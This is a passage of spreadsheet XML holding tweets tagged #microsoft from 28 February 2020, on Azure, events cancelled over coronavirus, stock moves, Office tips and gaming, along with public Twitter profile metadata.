    <t>#microsoft #nonprofit     Spice up your lunch hour! Download "Learn Azure in a Month of Lunches," from @MSFTNonprofits to learn how your nonprofit can digitally scale its impact &amp;amp; do more good using @Azure cloud computing. #Tech4Good #DigitalTransformation https://t.co/6DpgFNmrHJ</t>
  </si>
  <si>
    <t>Fri Feb 28 22:00:33 +0000 2020</t>
  </si>
  <si>
    <t>Off to Spain we go!
Microsoft to open Azure regions in Spain, expands Telefonica relationship
https://t.co/79BNN9lt7m
#microsoft #fridayfeeling #azure #Spain</t>
  </si>
  <si>
    <t>Fri Feb 28 21:59:06 +0000 2020</t>
  </si>
  <si>
    <t>Join us for the annual Office 365 Saturday hosted by the Houston Office 365 Community on April 18, 2020.  #office365 #poweraddicts #sharepoint #powerplatform #teams #microsoft https://t.co/b0v0XVuw9U</t>
  </si>
  <si>
    <t>{'id': 820572410, 'id_str': '820572410', 'name': 'Johnny Lopez | #learnitall', 'screen_name': 'rockett_15', 'location': 'Houston, Tx', 'description': 'Christian | Father | Texan | BAMF | Office 365 Evangelist | Architect | Power Platform Architect | #poweraddict | HOU365 President | Speaker', 'url': 'https://t.co/QSRJFRdHI5', 'entities': {'url': {'urls': [{'url': 'https://t.co/QSRJFRdHI5', 'expanded_url': 'https://about.me/JCLopez81', 'display_url': 'about.me/JCLopez81', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 757, 'friends_count': 957, 'listed_count': 32, 'created_at': 'Thu Sep 13 00:06:51 +0000 2012', 'favourites_count': 1791, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1773,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'http://pbs.twimg.com/profile_images/1194998910651174912/l0JSCapq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194998910651174912/l0JSCapq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/820572410/1522856167',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</si>
  <si>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21:55:22 +0000 2020</t>
  </si>
  <si>
    <t>#Cortex XDRTM Detects New Phishing Campaign Installing #NetSupport Manager #RAT
 malicious #Microsoft #Word document, disguised as a password-protected #NortonLifelock document
  employs evasion techniques  and utilizes the PowerShell PowerSploit
https://t.co/yDnPl6s6EK https://t.co/Bn9ALYOMtX</t>
  </si>
  <si>
    <t>Fri Feb 28 21:53:25 +0000 2020</t>
  </si>
  <si>
    <t>Function Crypto.js
#100DaysOfCode #JavaScript #Programming #VueJS #NodeJS #Angular #Android #iOS #web #301DaysOfCode #Linux #Microsoft #Mobile #npm #DOM #Malware https://t.co/OMXDOgvaA9</t>
  </si>
  <si>
    <t>Fri Feb 28 21:52:52 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Unfortunately the #MSIgniteTheTour in #Zurich is cancelled. The Swiss government @Bundesrat_Bern has temporarily banned events with more than 1000 people. Of course I can understand this decision and I support it. Nevertheless I was looking forward to the #Microsoft event.
</t>
  </si>
  <si>
    <t>Fri Feb 28 21:51:35 +0000 2020</t>
  </si>
  <si>
    <t>#BREAKING 
#WallStreet biggest losses for #Coronavirus 
$AAPL $MSFT $GOOGL $AMZN $FB $V 
$1 trillion lost in one week for #Apple #Microsoft #Google #Amazon #Facebook #Visa  https://t.co/WrLzxSK2d4</t>
  </si>
  <si>
    <t>{'id': 118794845, 'id_str': '118794845', 'name': 'Trading MarcoDaCosta', 'screen_name': 'MarcoDaCostaFX', 'location': 'StocksLand ðŸ’µðŸ›¢', 'description': 'Investor. Trader. Thinker. Trading Strategist. ðŸ’¶Â¡Stocks are my passion! ðŸŽ« #Bitcoin Entrepreneur. #TradingRebellion ðŸŽŸ', 'url': 'https://t.co/j8iMIbz2Xf', 'entities': {'url': {'urls': [{'url': 'https://t.co/j8iMIbz2Xf', 'expanded_url': 'https://youtu.be/peQ5iAmIR0k', 'display_url': 'youtu.be/peQ5iAmIR0k', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4116, 'friends_count': 1496, 'listed_count': 384, 'created_at': 'Mon Mar 01 19:35:17 +0000 2010', 'favourites_count': 21542, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1381787, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2C4A4A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191120331563577344/EcExjAfT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191120331563577344/EcExjAfT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/118794845/1572820192', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F5EBF1', 'profile_text_color': '050333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 21:46:53 +0000 2020</t>
  </si>
  <si>
    <t>KINGDOM HEARTS 3.
#xbox #xboxone #gamecollector #gamecollection #microsoft #retroplayer #retrogames #retrogamecollector #retrogamers https://t.co/IE31PBkPRg</t>
  </si>
  <si>
    <t>{'id': 2732302384, 'id_str': '2732302384', 'name': 'KBAM Retro Gamer', 'screen_name': 'KBAM_RetroGamer', 'location': 'bilbao', 'description': 'PÃ¡gina de juegos y consolas. #consolas #retrogame #games #playstation #nintendowii #nintendo64 #nintendo #playstationnetwork #gamescollection', 'url': 'https://t.co/h5bdmoNEX6', 'entities': {'url': {'urls': [{'url': 'https://t.co/h5bdmoNEX6', 'expanded_url': 'https://www.facebook.com/KBAMRG', 'display_url': 'facebook.com/KBAMRG', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 612, 'friends_count': 1376, 'listed_count': 25, 'created_at': 'Sun Aug 03 08:50:57 +0000 2014', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11103,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'http://pbs.twimg.com/profile_images/1224305335114006530/v3QhY52H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224305335114006530/v3QhY52H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2732302384/1580732036', 'profile_link_color': '001933',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</si>
  <si>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21:45:44 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Who wants to edit the PDF in Microsoft Word 
https://t.co/0clbTrLDqi
#PDF #pdfflow #documents #paper #office #Office365 #officedesign #microsoft #microsoftword #applepages #Fiverr #fiverrseller #mikes_office #fiverrgigs #fiverrgig #word https://t.co/dVuchwugZ8</t>
  </si>
  <si>
    <t>{'id': 1229161708838625280, 'id_str': '1229161708838625280', 'name': "Mike's Office", 'screen_name': 'mikesoffice2020', 'location': '', 'description': 'We create good looking, professional documents. Over 10 years of experience in creating, editing and formatting all forms of documents.', 'url': 'https://t.co/l2etiKdkFQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/l2etiKdkFQ', 'expanded_url': 'https://www.fiverr.com/mikes_office', 'display_url': 'fiverr.com/mikes_office', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Sun Feb 16 21:53:02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'http://pbs.twimg.com/profile_images/1229170593230131201/tmC4Nbu5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229170593230131201/tmC4Nbu5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1229161708838625280/1581892082',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</si>
  <si>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21:45:04 +0000 2020</t>
  </si>
  <si>
    <t>The journey through the digital transformation shows no signs of stopping. Microsoft CMO will be the first to tell you that. #microsoft #digialtransformation #cmo #cmos 
https://t.co/sgKQnOmIid</t>
  </si>
  <si>
    <t>{'id': 770482624775290882, 'id_str': '770482624775290882', 'name': 'CarbonPartners', 'screen_name': 'ProdMktgGrowth', 'location': '', 'description': 'https://t.co/lEFrnIMRZN\nProduct + Marketing + Growth: Executive Search. We tweet big moves of key tech talent in product, marketing and growth.', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/lEFrnIMRZN', 'expanded_url': 'http://www.CarbonPartners.io', 'display_url': 'CarbonPartners.io', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 31, 'friends_count': 205, 'listed_count': 2, 'created_at': 'Tue Aug 30 04:45:47 +0000 2016', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 162, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/862351244572143624/hnY_0wJ4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862351244572143624/hnY_0wJ4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/770482624775290882/1472532938',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</si>
  <si>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21:43:36 +0000 2020</t>
  </si>
  <si>
    <t>The latest The System software Daily! https://t.co/MltN8WlZxY Thanks to @RePerez1976 @aullido_precoz @kalaiselvan369 #cloud #microsoft</t>
  </si>
  <si>
    <t>{'id': 2676637905, 'id_str': '2676637905', 'name': 'jeffemmans', 'screen_name': 'jeffemmans', 'location': 'GREECE', 'description': '', 'url': 'https://t.co/Yl2a2DM4YK', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yl2a2DM4YK', 'expanded_url': 'https://jsemmans.blogspot.com/', 'display_url': 'jsemmans.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 720, 'friends_count': 26, 'listed_count': 386, 'created_at': 'Sat Jul 05 18:56:02 +0000 2014', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 40935,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'http://pbs.twimg.com/profile_images/1160660308249198593/IDlpKogq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1160660308249198593/IDlpKogq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2676637905/1573978148', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '0099B9', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Fri Feb 28 21:43:23 +0000 2020</t>
  </si>
  <si>
    <t>Arrived in good time. In the room, Die Hard on TV, room service on order, that's what I'm talking about!! 
Looking forward to the @scottishsummit tomorrow!!
#Glasgow #ScottishSummit #Microsoft #Dynamics365 #Office365 #Azure #Summit #Work #IngramMicroCloud #FridayNight #Chilled https://t.co/4cB1e0MlRW</t>
  </si>
  <si>
    <t>Fri Feb 28 21:40:28 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     VIA @office365     Enforcing your records management policies with Office 365(video) https://t.co/IL686btYZz</t>
  </si>
  <si>
    <t>Fri Feb 28 21:40:00 +0000 2020</t>
  </si>
  <si>
    <t>We mentioned a #Microsoft #Dvelopers Certification. But what about a #Google #certification? Well @MarTech_Review has you covered too! https://t.co/RLydo3vu8y</t>
  </si>
  <si>
    <t>{'id': 717438014079807492, 'id_str': '717438014079807492', 'name': 'Solutions Review', 'screen_name': 'SolutionsReview', 'location': 'Massachusetts, USA', 'description': 'Covering all news in #BigData  #CyberSecurity #Wireless  #EnterpriseMobility #CloudPlatforms &amp; more; Helping IT professionals find the best possible solutions.', 'url': 'https://t.co/tgrPOX3PPZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/tgrPOX3PPZ', 'expanded_url': 'http://solutionsreview.com', 'display_url': 'solutionsreview.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5020, 'friends_count': 752, 'listed_count': 493, 'created_at': 'Tue Apr 05 19:45:26 +0000 2016', 'favourites_count': 11207, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14821, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/720985652032974849/oVQ45CLf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/720985652032974849/oVQ45CLf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/717438014079807492/1460731378',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</si>
  <si>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21:39:23 +0000 2020</t>
  </si>
  <si>
    <t>How you can use the AIP unified labeling client TODAY https://t.co/TEhLiskEgQ #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 21:38:51 +0000 2020</t>
  </si>
  <si>
    <t>Want to go to one of the BEST #Microsoft #collaboration and #Office365 focused conferences in North America? Register for @NACollabSummit. Big conference content, small conference pricing in Branson, MO this April. Use code "JOY" for $50 off! https://t.co/Wt3puzF8s4</t>
  </si>
  <si>
    <t>{'id': 960877157542236160, 'id_str': '960877157542236160', 'name': 'JoyOfSharePoint', 'screen_name': 'JoyOfSharePoint', 'location': 'Tulsa, OK', 'description': 'Certified Microsoft Service Adoption Specialist, Modern Workplace Strategist &amp; trainer at PAIT Group. Host of the Joy of SharePoint webinar.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 597, 'friends_count': 439, 'listed_count': 13, 'created_at': 'Tue Feb 06 14:05:41 +0000 2018', 'favourites_count': 1391, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 998,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'http://pbs.twimg.com/profile_images/1111083358849781760/usKgfMC0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111083358849781760/usKgfMC0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/960877157542236160/1553738347',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</si>
  <si>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21:37:06 +0000 2020</t>
  </si>
  <si>
    <t>Centering cell contents in Excel, which option do you use?
#microsoft #excel #spreadsheet #formatting</t>
  </si>
  <si>
    <t>{'id': 87605231, 'id_str': '87605231', 'name': 'Oscar "OZ" Zamora', 'screen_name': 'ZamoraO', 'location': 'Fort Lauderdale, FL', 'description': 'Architect, Data &amp; AI Office of the CTO, Microsoft. Helping the largest clients migrate to the Azure Data Platform. Twitter handle with my *own* views, not MSFTs', 'url': 'https://t.co/qVPzh0NoSJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/qVPzh0NoSJ', 'expanded_url': 'http://ozamora.com', 'display_url': 'ozamora.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 469, 'friends_count': 546, 'listed_count': 29, 'created_at': 'Thu Nov 05 03:20:01 +0000 2009', 'favourites_count': 1594, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15363,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'http://pbs.twimg.com/profile_images/1233576644260003840/iRYo6Y18_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233576644260003840/iRYo6Y18_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/87605231/1508108702', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'F5A9A9', 'profile_sidebar_fill_color': 'C1C8EB', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 21:35:02 +0000 2020</t>
  </si>
  <si>
    <t>See how the @voxdotcom coverage compares against other news outlets on Ground News #AI #PopeFrancis #artificialintelligence #Vatican #Microsoft https://t.co/dvBUVzdedf</t>
  </si>
  <si>
    <t>Fri Feb 28 21:31:24 +0000 2020</t>
  </si>
  <si>
    <t>Main Meeting: Monday, March 2, 2020 Carl Franklin's Blazor Roadshow - https://t.co/jqfnPnmVFt #microsoft #dotnet #blazor #roadshow #carlfranklin #sddotnet #sandiegdotnet</t>
  </si>
  <si>
    <t>{'id': 105962225, 'id_str': '105962225', 'name': 'San Diego .Net UG', 'screen_name': 'sandiegodotnet', 'location': 'San Diego, CA', 'description': 'The San Diego .Net User Group is the premier resources for .Net Education in San Diego.', 'url': 'http://t.co/GjjlfVTEsw', 'entities': {'url': {'urls': [{'url': 'http://t.co/GjjlfVTEsw', 'expanded_url': 'http://www.sandiegodotnet.com', 'display_url': 'sandiegodotnet.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 311, 'friends_count': 20, 'listed_count': 11, 'created_at': 'Mon Jan 18 02:23:05 +0000 2010', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 354,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'http://pbs.twimg.com/profile_images/759959822703788032/LQ2LvmMo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/759959822703788032/LQ2LvmMo_normal.jpg',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</si>
  <si>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21:30:19 +0000 2020</t>
  </si>
  <si>
    <t>The security tech specialist @FEITIAN_Tech announced support for fingerprint biometric passwordless solutions for @Microsofts #AzureAD. 
#biometrics #FingerprintRecognition #FingerprintBiometrics #FIDO2 #Microsoft #MicrosoftAzure #BiometricSecurity
https://t.co/P4nVYpSZXp</t>
  </si>
  <si>
    <t>{'id': 1735172144, 'id_str': '1735172144', 'name': 'Mobile ID World', 'screen_name': 'MobileIDWorld', 'location': 'Toronto', 'description': 'You News Resource for All The Latest Developments in #MobileID, #mCommerce, #MobileBiometrics, #CloudIdentity, #AI, #IoT, #Wearables, #Telehealth &amp; More...', 'url': 'http://t.co/9ERDMCzN5I', 'entities': {'url': {'urls': [{'url': 'http://t.co/9ERDMCzN5I', 'expanded_url': 'http://www.mobileidworld.com/', 'display_url': 'mobileidworld.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1950, 'friends_count': 1137, 'listed_count': 184, 'created_at': 'Fri Sep 06 13:41:57 +0000 2013', 'favourites_count': 251, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14719,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'http://pbs.twimg.com/profile_images/378800000419370630/1d6157fb6d24aed9e0ca257b5ce412d2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000419370630/1d6157fb6d24aed9e0ca257b5ce412d2_normal.png', 'profile_link_color': '13B7E2',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</si>
  <si>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21:29:41 +0000 2020</t>
  </si>
  <si>
    <t>Reasons for Taking #Microsoft 70-740 #Exam Through Using Exam Dumps in Prep... https://t.co/MnSMRiFQ7F @TechBullion</t>
  </si>
  <si>
    <t>Fri Feb 28 21:27:04 +0000 2020</t>
  </si>
  <si>
    <t>#AI is helping #Microsoft rethink Office for mobile. Most interestingly, a lot of these features fundamentally require AI and #MachineLearning to achieve this new mobile #productivity paradigm. https://t.co/edKD4paJZC #ML</t>
  </si>
  <si>
    <t>Fri Feb 28 21:26:15 +0000 2020</t>
  </si>
  <si>
    <t>Taking this  to a new level. And this time, we brought our friends from @SevOneInc and @ParkMyCloud with us... #Cloud #Kubernetes #DevOps #microservices #containers #Cisco #Microsoft #AWS #IBM #Google https://t.co/3cZHOyn7zb</t>
  </si>
  <si>
    <t>{'id': 27955657, 'id_str': '27955657', 'name': 'Mark Newton', 'screen_name': 'marklnewton', 'location': 'Brighton, Michigan USA', 'description': 'Enterprise Client Solutions Manager.  Skier, baseball, Mountain Biking. Subaru Ambassador.\n Member of #turbonation', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1790, 'friends_count': 1384, 'listed_count': 23, 'created_at': 'Tue Mar 31 20:31:46 +0000 2009', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1421,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'http://pbs.twimg.com/profile_images/1234499608908378112/UlCo9X-9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234499608908378112/UlCo9X-9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27955657/1580309727', 'profile_link_color': 'E81C4F',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</si>
  <si>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Fri Feb 28 21:25:41 +0000 2020</t>
  </si>
  <si>
    <t>As #coronavirus sends #markets lower this week, #microsoft and #amazon of the big #tech #stocks are still positive for 2020. If you believe in "buy the dip," $145-$150 is the 200 day moving ave to watch for $MSFT @toddgordontrade @KerisAlison 
https://t.co/B1vEW7oCea #trading</t>
  </si>
  <si>
    <t>{'id': 57199821, 'id_str': '57199821', 'name': 'Lise Feng', 'screen_name': 'SVPR_Sweetheart', 'location': 'Silicon Valley', 'description': '#brand #comms #entrepreneur; @ThriveGlobal @GritDaily @Benzinga contributor; #startup #board #adviser', 'url': 'https://t.co/FQwR5n16uT', 'entities': {'url': {'urls': [{'url': 'https://t.co/FQwR5n16uT', 'expanded_url': 'http://www.linkedin.com/in/lisefeng', 'display_url': 'linkedin.com/in/lisefeng', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 795, 'friends_count': 420, 'listed_count': 144, 'created_at': 'Thu Jul 16 01:20:10 +0000 2009', 'favourites_count': 1370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4288,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'http://pbs.twimg.com/profile_images/1198646460931174400/XeWeonT2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198646460931174400/XeWeonT2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57199821/1438547895',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</si>
  <si>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Fri Feb 28 21:22:12 +0000 2020</t>
  </si>
  <si>
    <t>"As a result of gaining my Train the Trainer and #MCT certifications, my monthly salary has increased." https://t.co/mAi668pkyv  #microsoft https://t.co/1BiY0o0Vii</t>
  </si>
  <si>
    <t>Fri Feb 28 21:22:01 +0000 2020</t>
  </si>
  <si>
    <t>Introduction to #Azure #IoTEdge and Edge Modules
https://t.co/PEMc97ABvo
#Microsoft #AzureIoT #IoT #MicrosoftIoT #MicrosoftAzure #Cloud</t>
  </si>
  <si>
    <t>Fri Feb 28 21:21:35 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "How to Clean Install Windows 10 2004 Before Official Release:" https://t.co/wFT8z9swHH
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 21:20:28 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT dominated by bulls lifting the market higher throughout the day: https://t.co/FcOqI1Ariw
Sentiment: Slightly bullish #MSFT #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 21:14:59 +0000 2020</t>
  </si>
  <si>
    <t>"Only about 58% of #database developers use any source control system at all" - @redgate
@Microsoft #microsoft #sqlserver #ssdt #ssms #businessintelligence 
#CCGfridayfact #factfriday</t>
  </si>
  <si>
    <t>{'id': 35000778, 'id_str': '35000778', 'name': 'CCG', 'screen_name': 'ccganalytics', 'location': '', 'description': 'CCG helps organizations become more insights-driven, solve complex challenges and accelerate growth through industry-specific data and analytics solutions.', 'url': 'https://t.co/Au3babU90K', 'entities': {'url': {'urls': [{'url': 'https://t.co/Au3babU90K', 'expanded_url': 'http://www.ccganalytics.com', 'display_url': 'ccganalytics.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1058, 'friends_count': 993, 'listed_count': 87, 'created_at': 'Fri Apr 24 18:37:48 +0000 2009', 'favourites_count': 2101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3185, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F0F0F0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/969574771351478273/2i7fO7Rg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/969574771351478273/2i7fO7Rg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35000778/1563566566', 'profile_link_color': '8F7823', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F1F0E9', 'profile_text_color': '504F4F', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Fri Feb 28 21:13:55 +0000 2020</t>
  </si>
  <si>
    <t>Securing IoT for your Competitive Advantage https://t.co/6Z6G8ZcftT
For more info: https://t.co/byk7fVXmR7 #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business https://t.co/1zMV29dnps</t>
  </si>
  <si>
    <t>Fri Feb 28 21:12:48 +0000 2020</t>
  </si>
  <si>
    <t>My attempt at doing an in-place upgrade from server 2016 to server 2019. https://t.co/xfQFYz35zY #microsoft #windows #server #upgrade #hyperv # #windowsserver #mvpbuzz #networking</t>
  </si>
  <si>
    <t>Fri Feb 28 21:12:34 +0000 2020</t>
  </si>
  <si>
    <t>My attempt at doing an in-place upgrade from server 2016 to server 2019.  #microsoft #windows #server #upgrade #hyperv # #windowsserver #mvpbuzz #networking https://t.co/8jvdctKDOd</t>
  </si>
  <si>
    <t>Fri Feb 28 21:12:31 +0000 2020</t>
  </si>
  <si>
    <t>Unpopular opinion: Days Gone is a better version of The Last of Us. That being said i did enjoy TLoU.
#gaming #ps4 #playstation #gamer #tlou #tlou2 #DaysGone #sony #xbox #XboxOneX #Microsoft</t>
  </si>
  <si>
    <t>{'id': 988471638420312064, 'id_str': '988471638420312064', 'name': 'Inductivedead', 'screen_name': 'inductivedead', 'location': 'South Carolina, USA', 'description': 'I play video games, collect rare treasures, and watch movies. Yeah.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Mon Apr 23 17:36:18 +0000 2018', 'favourites_count': 222,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'http://pbs.twimg.com/profile_images/988473451039068160/D1WcfyZ0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/988473451039068160/D1WcfyZ0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/988471638420312064/1581658011',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</si>
  <si>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21:12:10 +0000 2020</t>
  </si>
  <si>
    <t>The Catholic Church proposes AI regulations that protect people https://t.co/D6O1uuKISj #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 21:11:37 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/TYRWkgMbCF
Nobody knows what the status will be for MS Ignite 2020 ?!
Let us hope the worldwide situation is getting better until then! Safety first! The health and safety of employees, customers, partners, and suppliers is a top priority.
#Microsoft #MSTeams #M365</t>
  </si>
  <si>
    <t>Fri Feb 28 21:11:34 +0000 2020</t>
  </si>
  <si>
    <t>It's finally here! The MS Flight Simulator 1 series flown and recorded where the graphics look as they should! The tour begins anew, and it was worth the wait!
#flightsimulator #Microsoft #simulator
https://t.co/TtxVR5uzPv</t>
  </si>
  <si>
    <t>{'id': 720866758710525952, 'id_str': '720866758710525952', 'name': 'The KILR Gamer aka Von Shep', 'screen_name': 'von_shep', 'location': '', 'description': 'A traveler and adventurer. Love to do video productions, gaming, and cooking. Minecraft is one of my favorites, because I can make it a world of my own.', 'url': 'https://t.co/ZiMjII9Ldo', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZiMjII9Ldo', 'expanded_url': 'https://www.youtube.com/channel/UC4jmNGz9ym2eiLSJRLXCuPQ/', 'display_url': 'youtube.com/channel/UC4jmNâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 74, 'listed_count': 2, 'created_at': 'Fri Apr 15 06:50:03 +0000 2016', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 351,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'http://pbs.twimg.com/profile_images/754814874165706752/HoaRHTf7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/754814874165706752/HoaRHTf7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/720866758710525952/1528210405',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</si>
  <si>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21:07:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft kills all third-party skills as it refocuses Cortana for the enterprise now trending on Monkey Viral - https://t.co/7VwpTdXBlQ https://t.co/TnCz2IQlxI</t>
  </si>
  <si>
